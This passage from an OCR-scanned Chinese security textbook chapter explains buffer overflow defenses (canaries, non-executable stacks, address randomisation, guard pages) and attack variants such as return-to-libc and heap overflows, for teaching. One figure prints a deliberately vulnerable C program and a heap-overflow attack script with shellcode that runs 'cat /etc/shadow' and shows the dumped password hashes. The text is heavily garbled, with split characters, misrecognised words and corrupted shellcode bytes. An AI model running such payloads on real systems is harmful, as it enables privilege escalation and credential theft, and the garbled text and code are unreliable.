时 长 度 信息 是 无 效 的 。 处 理 这 个 问题 需要 对 指针 的 语义 进行 扩充 ， 使 其 包含 边界 信息 及 库 例 程 
的 使 用 ， 确 保 这 些 值 被 正确 设置 。 在 [LHEE03] 里 列 出 了 几 种 这 样 的 方法 。 然 而 ， 使 用 可 能 或 
者 不 可 能 被 接受 的 技术 ， 一 般 性 能 会 受到 影响 ， 这 些 技术 也 要 求 需要 安全 特征 的 所 有 程序 和 库 
使 用 修改 的 编译 器 重新 编译 。 尽 管 对 操作 系统 的 新 版 本 和 相关 工具 来 说 这 是 可 行 的 ， 但 是 对 第 
三 方 的 应 用 程序 来 说 可 能 还 是 有 问题 的 。 

关于 C 语言 的 一 个 共识 源 自 对 不 安全 的 标准 库 例 程 的 使 用 ， 特 别 是 一 些 字 符 串 的 处 理 例 
程 。 改 进 系统 安全 性 的 一 个 方法 ， 是 用 较 安 全 的 变 体 来 代替 这 些 不 安全 的 ， 其 中 包括 新 函数 的 
提供 ， 例 如 包括 OpenBSD 在 内 的 BSD 系列 的 操作 系统 中 的 strlcpy0 的 使 用 。 使 用 这 些 安 全 的 
库 例 程 需 要 重新 编写 源 代码 使 其 符合 新 的 较 安 全 的 语义 ， 而 且 它 还 用 一 个 较 安 全 的 变 体 来 代替 
标准 的 字符 串 库 。Libsafe 是 一 个 众所周知 的 这 样 的 典范 ， 它 实现 了 标准 的 语义 但 又 包含 了 附 
加 的 检查 ， 保 证 了 复制 操作 没有 超出 栈 帧 里 的 局 部 变量 的 有 效 地 址 空间 。 尽 管 它 不 能 防止 相 邻 
的 局 部 变量 受到 破坏 ， 但 却 能 防止 旧 的 栈 帧 和 返回 地 址 的 值 的 任何 修改 ， 从 而 就 能 防止 我 们 前 
面 讨论 的 典型 的 栈 缓冲 区 溢出 类 型 的 攻击 。 这 个 库 是 一 个 动态 库 ， 它 被 安排 在 现 有 的 标准 库 之 
前 被 装载 ， 从 而 不 需要 重新 编译 就 可 以 对 现 有 的 程序 提供 保护 ， 还 提供 对 标准 的 库 例 程 的 动态 
访问 (就 像 大 多 数 程序 一 样 )。 现 有 的 修改 过 的 库 代码 已 经 至 少 像 标 准 库 一 样 有 效 ， 因 而 使 用 
它 可 以 很 容易 地 保护 现 有 的 程序 ， 避 免 一 些 形式 的 缓冲 区 溢出 攻击 。 

栈 保护 机 制 ” 一 个 保护 程序 避免 传统 的 栈 溢出 攻击 的 有 效 方法 ， 是 设 定 函 数 入 口 和 出 口 代 
码 并 检查 其 栈 帧 寻找 有 没有 受到 破坏 的 证 据 。 如 果 发 现 有 任何 修改 ， 程 序 就 终止 运行 ， 不 允许 
攻击 继续 进行 。 下 面 我 们 讨论 提供 这 类 保护 的 几 种 方法 。 

REE (stackguard) 是 已 知 的 最 好 的 保护 机 制 之 一 ， 它 是 GCC 编译 器 的 扩充 一 一 加 入 了 
附加 的 函数 入 口 和 出 口 代码 。 添 加 的 函数 入口 代码 ， 在 为 局 部 变量 分 配 的 地 址 空间 之 前 ， 在 旧 
的 帧 指针 地 址 之 下 写 人 一 个 canary 9 值 ， 在 继续 执行 这 些 常 用 函数 的 退出 操作 (恢复 旧 的 帧 指 
针 和 转移 控制 权 后 退 到 返回 地 址 ) 之 前 ， 添 加 的 函数 出 口 代 码 检查 canary 的 值 有 没有 变化 。 在 
一 个 典型 的 栈 缓冲 区 溢出 中 ， 任 何 为 了 改变 旧 的 帧 指针 和 返回 地 址 的 尝试 都 将 改变 这 个 值 ， 并 
将 会 被 检测 到 ， 从 而 导致 程序 异常 终止 。 为 了 对 函数 成 功 地 进行 防御 ，canary 的 值 应 该 是 不 可 
预测 的 ， 而 且 不 同系 统 上 canary 的 值 也 应 该 是 不 同 的 ， 这 一 点 非常 重要 。 如 果 不 是 这 样 ， 攻 
击 者 只 要 保证 shellcode 在 一 个 需要 的 存储 单元 包含 正确 的 canary 值 便 可 实施 攻击 。 通 常 在 进 
程 创 建 时 选择 一 个 随机 值 作为 canary 值 ， 并 将 其 当 作 进程 状态 的 一 部 分 保存 起 来 。 接 着 ， 添 
加 到 函数 入 口 和 出 口 的 代码 就 使 用 这 个 值 。 

使 用 这 个 方法 还 有 一 些 问 题 ， 首 先 ， 所 有 需要 保护 的 程序 都 要 重新 编译 。 其 次 ， 因 为 栈 
帧 的 结构 已 经 改变 ， 这 会 使 程序 出 现 一 些 问 题 ， 可 用 调试 器 分 析 栈 帧 。 然 而 ，canary 技术 已 经 
用 于 重新 编译 整个 Linux 发 行 版 ， 并 为 其 提供 了 一 个 针对 栈 滋 出 攻击 的 高 级 对 抗 措施 。 通 过 使 
用 微软 的 /GS Visual C++ 编译 器 选项 进行 编译 ， 类 似 的 功能 对 Windows 程序 也 是 有 效 的 。 . 

Stackshield 和 返回 地 址 防护 者 (Return Address Defender, RAD) 使 用 了 另外 一 种 栈 帧 保护 
机 制 。 这 些 也 是 GCC 的 扩展 版 ， 它 们 包含 附加 的 函数 入 口 和 出 口 代 码 。 这 些 扩展 没有 改变 栈 
帧 的 结构 。 而 是 ， 在 函数 入 口 处 ,添加 的 代码 将 返回 地 址 的 一 个 副本 写 到 内 存 的 一 个 安全 区 域 
(要 想 破坏 这 个 区 域 非常 困难 ) ; 在 函数 的 出 口 处 ， 添 加 的 代码 检查 栈 帧 里 的 返回 地 址 与 保存 的 
副本 ， 如 果 发 现任 何 变化 就 终止 程序 。 因 为 栈 帧 的 格式 没有 改变 ， 故 这 些 扩展 与 未 改变 的 调试 
器 兼容 。 此 外 ， 程 序 必 须 被 重新 编译 才 可 以 利用 这 些 扩展 。 


O ZAE (canary) 是 一 种 非常 敏感 的 鸟 ， 因 此 矿工 们 将 这 种 鸟 放 在 矿井 里 用 于 探测 有 毒 空气 ， 提 醒 矿 工 及 时 
BEE, canary 就 由 此 衍生 而 来 。 
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10.2.2 ”运行 时 防御 


就 像 我 们 已 经 注意 到 的 那样 ， 大 多 数 编译 时 (compile-time) 防御 方法 需要 对 现 有 的 程序 重 
新 编译 。 因 此 ， 人 们 有 了 对 运行 时 (run-time) 防御 的 兴趣 ， 像 操作 系统 通过 更 新 来 对 存在 漏洞 
的 程序 提供 保护 一 样 ， 运 行 时 防御 也 能 这 样 配置 。 这 些 防御 方法 包括 改变 进程 的 虚拟 地 址 空间 
的 内 存 管理 。 这 些 变化 或 者 改变 内 存 区 域 的 属性 ， 或 者 使 对 目标 缓冲 区 的 存储 单元 的 预测 变 得 
更 加 困难 ， 从 而 挫败 很 多 类 型 的 攻击 。 

可 执行 地 址 空间 保护 ”很 多 的 缓冲 区 溢出 攻击 ， 例 如 本 章 中 栈 溢出 攻击 的 实例 ， 都 涉及 复 
制 机 器 代码 到 目标 缓冲 区 并 转 而 执行 它 。 一 种 可 能 的 防御 是 在 栈 区 阻塞 代码 的 执行 ， 假 设 可 执 
行 的 代码 仅 能 在 进程 的 地 址 空间 找到 。 

为 了 有 效 地 支持 这 个 特征 ,需要 支持 把 从 处 理 器 的 内 存 管理 单元 (MMU) 到 虚拟 内 存 的 
标签 (tag) 页 都 当 作 不 可 执行 的 (nonexecutable)。 一 些 处 理 器 ， 例 如 Solaris 使 用 的 SPARC, 
已 经 对 此 支持 了 一 段 时 间 。 在 Solaris 里 使 用 时 需要 一 个 简单 的 内 核 参 数 的 变化 。 其 他 的 处 理 
器 ， 例 如 x86 家 族 ， 对 此 一 直 不 支持 ， 直 到 最 近 才 在 它 的 MMU 中 增加 了 一 个 相关 的 no-excute 
位 。Linux、BSD 及 其 他 UNIX 类 型 的 操作 系统 ， 也 进行 了 有 效 的 扩展 来 支持 这 个 特征 的 
使 用 。 一 些 系统 确实 也 有 能 力 保 护 栈 及 堆 。 但 是 堆 也 是 攻击 的 目标 ,我 们 将 在 10.3 节 中 对 
此 进行 讨论 。 在 最 近 的 Windows 系统 中 也 支持 不 可 执行 (no-execute) 保护 。 

使 栈 (AE) 成 为 不 可 执行 的 ， 对 于 现 有 的 程序 可 以 提供 高 等 级 的 、 针 对 很 多 类 型 的 缓冲 
区 溢出 攻击 的 保护 。 因 此 ， 在 很 多 最 近 发 行 的 操作 系统 标准 版 里 都 包含 了 这 个 扩展 。 然 而 ， 对 
程序 来 说 还 是 存在 一 个 问题 ， 那 就 是 要 将 可 执行 的 代码 设置 在 栈 中 。 这 是 能 够 发 生 的 ， 例 如 在 
Java Runtime 系统 使 用 的 即时 (just-in-time) 编译 器 里 ， 就 有 可 能 发 生 这 种 情况 。C 语言 中 ， 栈 
使 用 的 可 执行 代码 也 可 用 于 实现 函数 的 峙 套 (一 个 GCC 的 扩展 )， 以 及 用 于 Linux 的 符号 处 理 
机 制 。 支 持 这 些 需求 需要 特别 的 规定 。 不 管 怎样 ， 它 被 认为 是 保护 现 有 的 程序 以 及 加 固 系统 免 
受 攻击 的 最 好 的 方法 之 一 。 

地 址 空间 随机 化 ” 另 一 种 能 够 用 于 阻止 攻击 的 运行 时 防御 技术 是 对 进程 地 址 空间 中 的 关键 
数据 结构 的 存储 单元 的 处 理 。 特 别 地 ;我 们 回忆 一 下 ， 为 了 实现 典型 的 栈 溢出 攻击 ， 攻 击 者 需 
要 能 够 预测 目标 缓冲 区 大 致 的 位 置 ， 攻 击 者 使 用 这 个 预测 到 的 地 址 确定 一 个 合适 的 返回 地 址 以 
在 攻击 中 使 用 ， 在 此 将 控制 权 转 移 给 shellcode。 一 种 显著 增加 预测 难度 的 技术 是 ， 以 随机 的 方 
式 改变 为 每 一 个 进程 的 栈 设置 的 地 址 。 在 现代 的 处 理 嚣 上， 有效 地 址 的 范围 是 巨大 的 (32 位 )， 
大 多 数 程序 仅仅 需要 其 中 很 少 的 一 部 分 。 所 以 ， 大 约 1 兆 字 节 的 栈 内 存 区 域 在 有 效 地 址 空间 中 
移动 ， 这 对 大 多 数 程序 只 有 很 小 的 冲击 ， 但 是 要 想 预测 目标 缓冲 区 的 地 址 几乎 是 不 可 能 的 。 这 
种 变化 与 大 多 数 存在 漏洞 的 缓冲 区 的 大 小 相 比 大 多 了 。 因 此 ， 也 就 没 机 会 找到 一 个 足够 大 的 
NOP sled 处 理 这 个 范围 内 的 地 址 。 这 再 次 为 现 有 的 程序 提供 了 一 定 程度 的 保护 ， 当 它 不 能 停止 
攻击 行动 时 ， 程 序 由 于 一 次 无 效 的 内 存 引 用 也 能 异常 终止 。 

与 这 种 方法 相关 的 问题 是 随机 动态 内 存 分 配 的 使 用 。 正 如 我 们 将 在 10.3 节 中 讨论 的 那样 ， 
会 有 一 类 堆 缓冲 区 溢出 攻击 ， 它 们 利用 这 样 一 个 事实 : 连续 内 存 分 配 或 者 堆 管理 数据 结构 的 排 
列 非 常 接近 。 堆 内 存 分 配 的 随机 选择 使 预测 目标 缓冲 区 地 址 变 得 相当 困难 ， 从 而 可 以 成 功 阻止 
堆 滋 出 攻击 。 

攻击 的 另 一 个 目标 是 标准 库 例 程 的 存储 位 置 。 在 一 次 绕 过 保护 的 尝试 中 ， 例 如 绕 过 不 可 执 
行 的 栈 ， 一些 缓冲 区 溢出 的 变种 攻击 在 标准 库 里 存在 的 代码 。 通 常 ， 这 些 代码 在 相同 的 程序 里 
被 装载 到 相同 的 地 址 ， 为 了 对 付 这 种 形式 的 攻击 ， 我 们 可 以 使 用 一 个 安全 扩展 ， 随 机 选择 一 个 
程序 装载 标准 库 的 次 序 ， 随 机 选择 它 的 虚拟 内 存 地 址 的 存储 位 置 ， 这 样 就 可 以 使 任何 特定 函数 
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的 地 址 变 得 不 可 预测 ， 从 而 减少 了 特定 攻击 正确 预测 地 址 的 机 会 。 

OpenBSD 系统 在 一 个 安全 系统 的 技术 支持 中 包括 了 这 些 扩展 的 所 有 版 本 。 

guard 页 最 后 一 个 能 够 被 使 用 的 运行 时 防御 技术 是 在 进程 的 地 址 空间 的 关键 区 域 之 间 设 
置 guard 页 。 它 利用 了 这 样 一 个 事实 : 一 个 进程 的 有 效 虚拟 内 存 比 它 通常 所 需要 的 要 多 很 多 。 
地 址 空间 的 每 一 部 分 所 使 用 的 一 系列 地 址 之 间 都 设置 有 间隔 (gap), BRE 10-4 所 描述 的 那 
样 。 这 些 间隔 ， 或 者 称 guard 页 ， 被 当 作 非法 地 址 在 MMU 里 做 了 标记 ,任何 访问 它们 的 尝试 
都 将 导致 进程 终止 。 这 就 能 防止 缓冲 区 溢出 攻击 ， 特 别 是 全 局 数据 溢出 攻击 ， 因 为 它 企图 改写 
进程 的 地 址 空间 的 相 邻 区 域 ， 例 如 全 局 偏 移 量 表 ， 正 如 我 们 将 在 10.3 节 讨 论 的 。 

进一步 的 扩展 是 在 栈 帧 之 间 ， 或 者 是 在 堆 的 不 同 的 存储 区 域 之 间 设 置 guard 页 。 它 能 提供 
进一步 的 保护 ， 避 免 堆 和 栈 溢出 攻击 ， 但 是 它 耗费 执行 时 间 ， 因 为 它 需 要 支持 数目 巨大 的 页 映 
射 需求 。 


10.3 ”其 他 形式 的 溢出 攻击 


这 一 节 ， 我 们 讨论 一 些 其 他 的 缓冲 区 溢出 攻击 ， 并 提供 可 能 的 防御 措施 。 这 些 攻击 包括 栈 
溢出 的 各 种 变种 ， 例 如 返回 导向 的 系统 调用 、 保 存在 程序 堆 区 的 数据 溢出 ， 以 及 保存 在 进程 的 
全 局 数据 区 的 数据 溢出 。 关 于 这 些 攻击 的 更 详细 的 调查 分 析 ， 可 以 在 [LHEE03] 中 找到 。 


10.3.1 替换 栈 帧 


在 典型 的 缓冲 区 溢出 中 ， 攻 击 者 改写 了 设置 在 一 个 栈 帧 的 局 部 变量 区 域 的 缓冲 区 ， 并 改写 
保存 的 帧 指针 和 返回 地 址 。 这 种 攻击 方式 的 一 个 变种 就 是 改写 缓冲 区 以 及 保存 的 帧 指针 地 址 。 
保存 的 帧 指针 值 被 改变 为 被 改写 的 缓冲 区 顶部 附近 的 一 个 存储 单元 ， 在 这 个 位 置 用 一 个 指向 
shellcode 的 缓冲 区 较 低位 置 的 返回 地 址 创建 一 个 虚假 的 栈 帧 。 随 着 这 次 变化 ， 当 前 的 函数 正常 
返回 到 正在 调用 它 的 函数 ， 因 为 它 的 返回 地 址 没有 被 改变 。 然 而 ， 正 在 调用 的 函数 现在 使 用 蔡 
代 的 虚假 的 栈 帧 ， 当 它 返回 时 ， 控 制 权 将 会 转移 到 被 改写 的 缓冲 区 里 的 shellcode。 

这 似乎 是 一 个 相当 直接 的 攻击 ， 当 仅 有 一 个 有 限 的 缓冲 区 可 能 发 生 溢出 时 才 可 以 发 生 ， 因 
为 它 仅 允 许 改 变 保存 的 帧 指针 而 不 改变 返回 地 址 。 你 可 以 回顾 一 下 图 10-7 中 显示 的 程序 示例 ， 
它 仅 仅 允许 用 附加 的 足够 的 缓冲 区 内 容 来 改写 帧 指针 ， 但 不 包括 返回 地 址 。 这 个 示例 也 可 能 不 
使 用 这 种 攻击 方式 ， 因 为 最 后 的 NULL 结束 了 读 人 缓冲 区 的 字符 串 ， 这 就 既 改 变 了 保存 的 帧 
指针 ， 又 改变 了 返回 地 址 ， 这 将 会 阻碍 攻击 。 然 而 ， 还 有 一 类 栈 溢出 攻击 称 为 差 一 错误 〈o 任 
by-one) 攻击 。 这 类 攻击 一 般 发 生 在 一 个 二 进 制 缓冲 区 复制 的 时 候 ， 此 时 程序 员 在 程序 里 包含 
一 些 代码 用 于 检查 被 转移 的 字 节 数 ， 但 是 由 于 一 个 编码 错误 ， 人 允许 比 有 效 地 址 空间 多 一 个 字 节 
的 内 容 复 制 。 当 一 个 条 件 测 试 使 用 <= 代替 了 <， 或 者 使 用 >= 代替 了 > 时 都 会 发 生 这 种 情况 。 
如 果 在 保存 的 帧 指针 之 下 紧 挨 着 设置 了 缓冲 区 ， 接 下 来 这 个 多 出 的 字 节 就 能 够 改变 这 个 地 址 
的 首位 置 (x86 处 理 器 上 最 小 的 有 意义 的 字 节 )。 尽 管 改变 一 个 字 节 好 像 问题 不 大 ,但 这 却 给 了 
攻击 者 可 乘 之 机 ， 攻 击 者 想 要 在 当前 帧 的 范围 内 将 真实 的 旧 栈 帧 (就 在 内 存 当 前 的 栈 帧 之 上 ) 
的 地 址 ， 改 变 成 一 个 设置 在 缓冲 区 内 新 的 虚假 的 栈 帧 ， 这 个 变换 一 般 仅 需要 几 十 个 字 节 。 如 果 
幸运 地 使 用 了 这 个 地 址 ， 一 个 字 节 (one-byte) 的 变化 就 足够 了 。 因 此 ， 将 控制 权 转 移 给 
shellcode 的 溢出 攻击 是 可 能 发 生 的 ， 即 使 是 非 直接 的 。 

这 种 类 型 的 攻击 有 一 些 附 加 的 限制 。 在 典型 的 栈 溢出 攻击 中 ， 攻 击 者 仅 需 要 猜测 缓冲 区 大 
概 的 地 址 值 ， 因 为 偏差 可 以 通过 NOP sled 来 消除 。 然 而 要 想 间 接 进 行 攻击 ， 攻 击 者 必须 知道 


O 注意 本 章 的 例子 使 用 的 GCC 编译 器 不 是 这 种 情况 ， 这 是 很 多 其 他 编译 器 的 一 个 通常 的 安排 。 
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缓冲 区 精确 的 地 址 ， 正 如 当 改 写 旧 帧 指针 值 时 不 得 不 使 用 虚假 的 栈 帧 的 准确 地 址 那样 ， 这 将 能 
够 减少 攻击 者 攻击 成 功 的 机 会 。 攻 击 者 的 另外 一 个 问题 出 现在 控制 权 已 经 返回 到 正在 调用 的 函 
数 之 后 。 因 为 函数 正在 使 用 虚假 的 栈 帧 ， 正 在 使 用 的 任何 局 部 变量 现在 都 无 效 ， 在 这 个 函数 执 
行 完 成 并 返回 进入 shellcode 之 前 使 用 它们 ， 都 能 引起 程序 崩溃 。 然 而 ， 对 大 多 数 栈 重 写 攻击 
来 说 这 是 一 个 冒险 行为 。 

防御 这 种 类 型 的 攻击 需要 有 任何 检测 函数 出 口 代码 的 栈 帧 和 返回 地 址 变化 的 栈 保护 机 制 。 
而 且 ， 使 用 不 可 执行 的 栈 也 能 够 阻止 shellcode 的 运行 ， 尽 管 单独 使 用 它 不 能 阻止 我 们 将 要 在 
下 面 讨论 的 返回 导向 的 系统 调用 攻击 的 一 个 非 直接 的 变种 。 内 存 中 栈 的 随机 选择 和 系统 库 的 随 
机 选择 ， 都 将 最 大 限度 地 阻碍 攻击 者 猜测 到 使 用 的 正确 地 址 ， 因 而 成 功 阻止 攻击 的 执行 。 


10.3.2 ”返回 系统 调用 


前 面 介绍 的 不 可 执行 的 栈 ( nonexecutable stack) 是 防御 缓冲 区 溢出 的 ， 而 攻击 者 已 经 转向 B66 
另 一 种 不 同 的 攻击 一 一 改变 返回 地 址 ， 使 程序 跳 转 到 系统 上 现 有 的 代码 。 你 可 以 回想 一 下 ,我 
们 在 讨论 基本 的 栈 缓冲 区 溢出 攻击 时 ， 已 经 注意 到 了 这 一 点 。 大 多 数 情况 下 攻击 者 将 选择 标准 
库 函 数 的 地 址 ,例如 函数 system0。 攻 击 者 详细 地 设 定 一 次 溢出 : 填充 缓冲 区 ， 用 一 个 合适 的 地 
址 代替 保存 的 帧 指针 ， 用 希望 的 库 函 数 的 地 址 代替 返回 地 址 ， 写 人 一 个 占 位 符 (placeholder) 的 
{A ( 库 函 数 认为 这 是 一 个 返回 地 址 )， 接 下 来 写 人 传 给 库 函 数 的 参数 的 值 。 当 被 攻击 的 函数 返回 
时 ， 它 恢复 (改变 的 ) 帧 指针 ， 然 后 出 栈 ， 并 将 控制 权 转交 到 返回 地 址 ， 而 这 个 地 址 正 是 引发 库 
函数 代码 开始 执行 的 地 址 。 因 为 该 函数 相信 它 已 经 被 调用 了 ， 它 把 栈 项 部 的 当前 值 ( 占 位 符 ) 当 
作 一 个 返回 地 址 ， 并 使 用 上 面 的 参数 。 在 这 个 位 置 的 下 面 它 将 依次 建立 一 个 新 的 栈 帧 并 且 运 行 。 

如 果 这 个 库 函 数 正 在 被 调用 ， 例 如 system ("shell command line")， 接 下 来 指定 的 shell 命 
令 在 控制 权 返 回 到 被 攻击 的 程序 (由 于 攻击 很 可 能 崩溃 ) 之 前 将 会 被 运行 。 依 赖 于 参数 的 类 型 
以 及 库 函 数 对 它们 的 解释 ， 攻 击 者 需要 准确 知道 它们 的 地 址 (一 般 在 被 改写 的 缓冲 区 范围 内 )。 
在 这 个 例子 中 ， 尽 管 可 将 一 些 空格 置 于 "shell command line" 的 前 面 ， 但 这 些 空间 会 被 当 作 空白 
空间 处 理 并 被 shell 忽略 ， 从 而 在 地 址 的 准确 猜测 上 人 允许 一 些 偏 差 。 

另 一 个 不 同 的 攻击 是 将 两 个 库 函 数 调 用 链接 在 一 起 ， 在 一 个 库 函 数 之 后 调用 另 一 个 库 函 
数 。 链 接 是 通过 让 占 位 符 的 值 ( 当 作 第 一 个 被 调用 的 库 函 数 的 返回 地 址 对 待 ) 成 为 第 二 个 函数 
的 地 址 实现 的 。 接 下 来 ， 每 个 函数 的 参数 不 得 不 在 栈 内 的 合适 存储 单元 被 设置 ， 这 通常 限制 了 
哪个 函数 能 够 被 调用 ， 以 及 按照 什么 次 序 调 用 。 一 般 是 将 第 一 个 地 址 设置 为 库 函数 strcpy( 的 
地 址 。 指 定 的 参数 允许 函数 从 被 攻击 的 缓冲 区 复制 一 些 shellcode 到 内 存 的 另 一 个 区 域 ， 该 区 
域 没 有 被 标记 为 不 可 执行 的 。 第 二 个 地 址 指向 shellcode 被 复制 到 的 目标 地 址 。 这 就 允许 一 个 
攻击 者 注入 他 们 自己 的 代码 ， 同 时 也 避 开 了 不 可 执行 的 栈 的 限制 。 

防御 缓冲 区 溢出 的 方法 还 包括 许多 栈 保护 机 制 一 一 利用 函数 的 出 口 代码 检测 栈 帧 或 者 返回 地 
址 的 修改 情况 。 同 样 ， 内 存 中 栈 的 随机 选择 和 系统 库 的 随机 选择 ， 也 能 成 功 阻止 这 些 攻击 的 执行 。 


10.3.3 HHH 


随 着 人 们 对 栈 缓冲 区 溢出 问题 认识 的 深入 ， 以 及 相应 的 防御 措施 的 开发 ， 攻 击 者 已 经 将 注 
意 力 转移 到 利用 进程 地 址 空间 中 的 缓冲 区 溢出 实现 攻击 。 一 个 可 能 的 目标 是 从 堆 (heap) 中 动 
态 分 配 的 内 存 缓冲 区 。 堆 一 般 设 置 在 程序 代码 和 全 局 数据 之 上 ， 并 在 内 存 中 逐渐 向 上 分 配 (而 
栈 是 逐渐 向 下 分 配 )。 使 用 动态 数据 结构 的 程序 是 从 堆 中 请 求 内 存 的 ， 例 如 记录 的 链表 。 如 果 
这 样 一 条 记录 包含 一 个 缓冲 区 溢出 漏洞 ， 内 存 随 之 能 够 受到 破坏 的 威胁 。 与 栈 不 一 样 的 是 ， 堆 
空间 中 没有 容易 引发 控制 权 转 移 的 返回 地 址 。 然 而 ， 如 果 分 配 的 空间 包含 一 个 指向 函数 的 指 [36 
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针 ， 而 这 个 函数 代码 随后 就 要 被 调用 ， 攻 击 者 能 够 安排 改变 这 个 地 址 指向 被 改写 的 缓冲 区 的 
shellcode。 通 常 ， 处 理 输入 /输出 或 者 解码 一 个 压缩 图 像 或 者 视频 文件 时 ， 程 序 使 用 记录 列表 
保存 大 块 的 数据 ， 这 时 上 述 攻 击 可 能 发 生 。 也 可 以 保存 当前 的 数据 块 ， 那 么 这 条 记录 可 以 包含 
一 个 指向 处理 这 类 输入 《从 而 允许 通过 一 个 通用 的 函数 处 理 不 同 种 类 的 数据 块 ) 的 函数 指针 。 
这 样 的 代码 已 被 使 用 并 被 成 功 攻击 。 

作为 一 个 示例 ， 我 们 考虑 图 10-11a 所 示 的 程序 代码 。 它 声明 (declare) 了 一 个 包含 一 个 缓 
冲 区 和 一 个 函数 指针 8 的 结构 体 。 我 们 讨论 在 主 例 程 main( 中 显示 的 代码 ， 它 使 用 标准 库 函 数 
malloc) 在 堆 中 为 结构 体 的 一 个 新 实例 (instance) 分 配 空 间 ， 接 下 来 使 主 函 数 的 处 理 缓冲 区 的 
函数 指针 指向 函数 showlen()。 不 安全 库 例 程 gets() 的 使 用 再 一 次 显示 了 一 个 不 安全 缓冲 区 的 复 
制 。 随 后 ， 调 用 函数 指针 处 理 缓冲 区 。 


/* record type to allocate on heap */ 
typedef struct chunk { 

char inp(64]; /* vulnerable input buffer */ 

void (*process) (char *); /* pointer to function to process inp */ 
} chunk_t; 


void showlen(char *buf) 


int len; 
len = strlen (buf); 
printf ("buffers read td chars\n", len); 


} 
int main(int argc, char *argv[]) 
chunk_t *next; 


setbuf (stdin, NULL); 

next = malloc (sizeof (chunk_t)); 
next->process = showlen; 

printf ("Enter value: "); 

gets (next->inp); 

next ->process (next->inp) ; 
printf ("buffer5 done\n") ; 





a) 存在 漏洞 的 堆 溢 出 C 语 言 代码 


$ cat attack2 

#!/bin/sh 

# implement heap overflow against program buffers 
perl -e ‘print pack("H*", 
"90909090909090909090909090909090" . 
"9090eb1a5e31c08846078d1le895e0889" . 
"460cb00b89f38d4e088d560ccd80e8el" . 
"FEFLLL2£62696e2£7368202020202020" . 
"b89704080a") ; 

print "whoami\n"; 

print "cat /etc/shadow\n";' 


$ attack2 | buffers 

Enter value: 

root 

root :$1$40Inmych$T3BVS2E30yNRGjGUZF403/ :13347:0:99999:7::: 
daemon: *:11453:0:99999:7::: 


nobody: *:11453:0:99999:7::: 
knoppix: $1$p2wziIML$/yVHPQuwSkv1lUFJs3b9aj/ :13347:0:99999:7::: 





b) 堆 溢出 攻击 示例 
图 10-11 HERS MA Bil 


已 经 确定 程序 中 包含 堆 洲 出 漏洞 的 攻击 者 ， 他 将 会 建立 一 个 如 下 的 攻击 序列 : 程序 运行 时 


日 ”实际 上 ， 这 样 一 个 结构 体 可 能 有 更 多 的 成 员 ， 包 括 标 志和 其 他 指向 该 结构 体 的 指针 ， 这 样 它们 就 能 链接 在 
一 起 。 然 而 ， 我 们 这 里 讨论 的 基本 攻击 ， 由 于 改变 较 小 ， 因 此 还 能 继续 工作 。 
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我 们 检查 到 程序 地 址 设置 在 0x080497a8 ， 结 构 体 仅 包 含 64 个 字 节 的 缓冲 区 和 一 个 函数 指针 ; 
假设 攻击 者 使 用 我 们 早期 设计 的 如 图 10-8 所 示 的 shellcode， 攻 击 者 将 通过 在 前 面 扩展 NOP 
sled 填充 这 个 shellcode 达到 准确 的 64 个 字 节 ， 然 后 在 缓冲 区 里 追加 一 个 合适 的 目标 地 址 用 于 
改写 函数 指针 。 这 个 目标 地 址 是 0x080497b8 ( 字 节 是 反 序 的 ， 像 前 面 讨 论 的 ， 因 为 x86 RIEF 
节 在 最 前 ， 即 小 端 字 节 (little-endian))。 图 10-11b 中 显示 了 攻击 脚本 的 内 容 和 直接 运行 漏洞 程 
序 (假设 是 setuid root) 的 结果 ， 拥 有 特权 的 shell 命令 得 以 成 功 执行 。 

即使 存在 漏洞 的 结构 体 在 堆 内 没有 直接 包含 函数 指针 ， 还 是 可 以 发 现 攻击 的 。 这 利用 了 这 
样 一 个 事实 : 在 堆 区 分 配 的 内 存 区 域 包含 附加 的 内 存 ， 这 超出 了 用 户 的 请 求 。 这 个 附加 的 内 存 
控制 着 内 存 分 配 和 重新 分 配 库 例 程 使 用 的 管理 数据 结构 体 。 这 些 结构 体 可 以 直接 或 者 非 直 接地 
允许 攻击 者 访问 函数 指针 并 最 终 被 调用 。 其 至 可 以 使 用 几 个 缓冲 区 内 多 个 溢出 的 交互 (一 个 装 
载 shellcode， 另 一 个 调节 目标 函数 的 指针 并 引用 它 )。 

防御 堆 溢 出 的 方法 包括 使 堆 区 也 成 为 不 可 执行 的 。 这 会 阻止 写 到 堆 区 的 代码 的 执行 。 然 
而 ， 另 一 种 返回 导向 的 系统 调用 的 攻击 还 是 有 可 能 发 生 的 。 对 堆 区 内 存 分 配 采取 随机 选择 使 得 
对 目标 缓冲 区 地 址 的 预测 变 得 极其 困难 ， 从 而 阻碍 一 些 堆 溢出 攻击 的 成 功 执行 。 另 外 ， 内 存 的 
分 配 (allocator) 和 回收 (deallocator) 函数 包含 了 对 管理 数据 是 否 受 到 破坏 的 检查 ， 它 们 能 够 
检测 和 终止 使 一 个 已 分 配 内 存 发 生 溢出 的 任何 企图 。 


10.3.4 全 局 数据 区 溢出 


我 们 讨论 的 最 后 一 类 缓冲 区 溢出 涉及 在 程序 的 全 局 (静态 ) 数据 区 中 设置 的 缓冲 区 。 
图 10-4 中 显示 ， 全 局 数据 从 程序 文件 中 被 装载 ， 并 设置 在 程序 代码 区 之 上 。 如 果 又 是 使 用 不 
安全 的 缓冲 区 操作 ， 数 据 可 以 溢出 到 一 个 全 局 数据 的 缓冲 区 ， 并 改变 相 邻 的 内 存 地 址 ， 包 括 可 
能 是 随后 就 要 调用 的 函数 的 一 个 函数 指针 。 

图 10-12a 举例 说 明了 这 样 一 个 漏洞 程序 与 图 10-11a 有 很 多 相似 之 处 ， 除 了 声明 结构 体 
为 一 个 全 局 变量 以 外 )。 在 这 个 攻击 的 设计 中 ， 事 实 上 只 有 目标 地 址 发 生 了 改变 。 我 们 发 现 定 
义 的 全 局 结构 体 变 量 的 地 址 是 0x08049740， 它 被 当 作 攻击 的 目标 地 址 。 我 们 还 注意 到 ， 全 局 
变量 通常 不 改变 存储 位 置 ， 因 为 它们 的 地 址 在 程序 代码 中 被 直接 使 用 。 攻 击 脚本 和 成 功 执行 的 
结果 显示 在 图 10-12b 中 。 

这 种 攻击 更 复杂 的 变种 利用 了 这 样 一 个 事实 : 进程 的 地 址 空间 可 以 在 全 局 数据 区 相 邻 的 区 
域 里 包含 一 些 其 他 的 管理 表 (management table)。 这 种 表 能 够 包含 对 析 构 函数 (destructor)(GCC 
C 和 C++ 的 扩展 )、 全 局 偏 移 量 (global-offset) 表 (一 旦 库 被 装载 ， 用 于 解决 对 动态 库 的 函数 
